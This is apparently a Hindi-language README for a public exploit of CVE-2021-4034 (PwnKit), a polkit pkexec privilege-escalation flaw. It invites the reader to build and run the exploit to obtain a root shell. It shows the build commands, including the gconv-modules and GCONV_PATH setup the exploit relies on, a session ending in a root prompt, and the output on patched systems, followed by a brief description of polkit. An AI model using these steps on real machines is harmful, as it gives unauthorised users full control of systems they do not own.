
# CVE-2021-4034 (PwnKit) के लिए एक्सप्लॉइट जो polkit pkexec भेद्यता के माध्यम से रूट शेल प्रदान करता है। स्रोत कोड और बिल्ड निर्देश शामिल हैं।
Polkit विशेषाधिकार वृद्धि शोषण के लिए एक दिन
बस make, ./cve-2021-4034 चलाएँ और अपना रूट शेल प्राप्त करें।
वास्तविक लेखकों द्वारा मूल सलाह यहाँ है
यदि शोषण काम कर रहा है तो आपको तुरंत रूट शेल मिल जाएगा:
vagrant@ubuntu-impish:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# exit
अधिकांश सिस्टम पर polkit को अपडेट करने से शोषण पैच हो जाएगा, इसलिए आपको उपयोग दिखेगा और प्रोग्राम बाहर निकल जाएगा:
vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
pkexec --version |
--help |
--disable-internal-agent |
[--user username] PROGRAM [ARGUMENTS...]
See the pkexec manual page for more details.
vagrant@ubuntu-impish:~/CVE-2021-4034$
Polkit (पूर्व में PolicyKit) यूनिक्स-जैसे ऑपरेटिंग सिस्टम में सिस्टम-व्यापी विशेषाधिकारों को नियंत्रित करने के लिए एक घटक है। यह गैर-विशेषाधिकार प्राप्त प्रक्रियाओं के लिए विशेषाधिकार प्राप्त प्रक्रियाओं के साथ संवाद करने का एक संगठित तरीका प्रदान करता है। polkit का उपयोग करके pkexec कमांड के बाद इच्छित कमांड (रूट अनुमति के साथ) निष्पादित करके बढ़े हुए विशेषाधिकारों के साथ कमांड चलाना भी संभव है।